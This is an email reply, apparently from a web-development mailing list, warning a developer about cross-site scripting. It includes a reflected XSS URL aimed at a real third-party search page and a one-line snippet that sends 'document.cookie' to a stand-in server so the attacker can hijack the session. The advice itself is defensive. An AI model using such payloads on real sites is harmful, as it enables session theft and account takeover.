> > Or steal it. :)
> >
> > I hope you have checked your site for any cross-site scripting
> > vulnerabilities. This is exactly where vulnerabilities like this
come
> > into play...
>
> Interesting -- I'm only a few days away from launching this... could
you
> elaborate on the potential risk, or point me to some documentation?

Just search google for Cross Site Scripting and you'll find a ton of
articles about that specifically. It all comes down to validating user
input and not displaying it directly back to the screen.

Here is a link, for example, that'll pop up your cookies for cnn.com.
(watch the wrapping!)

http://cnn.looksmart.com/r_search?l&izch&qc=&col=cnni&qm=0&st=1&nh=10&rf
=1&venue=all&keyword=&qp=&search=0&key=%3Cscript%3Ealert%28%27Hi%27%29%3
B%3C%2Fscript%3E

Now, how about instead of just executing alert("Hi"), I do a
location.href='www.myserver.com?var='+document.cookie; and send myself
your cookie. Then I just simply make my cookie match yours, and poof,
I'm you. :)

It all comes down to validating user input and never showing it directly
back to the browser/screen.

Similar problems exist for variables you use in database queries...

---John Holmes...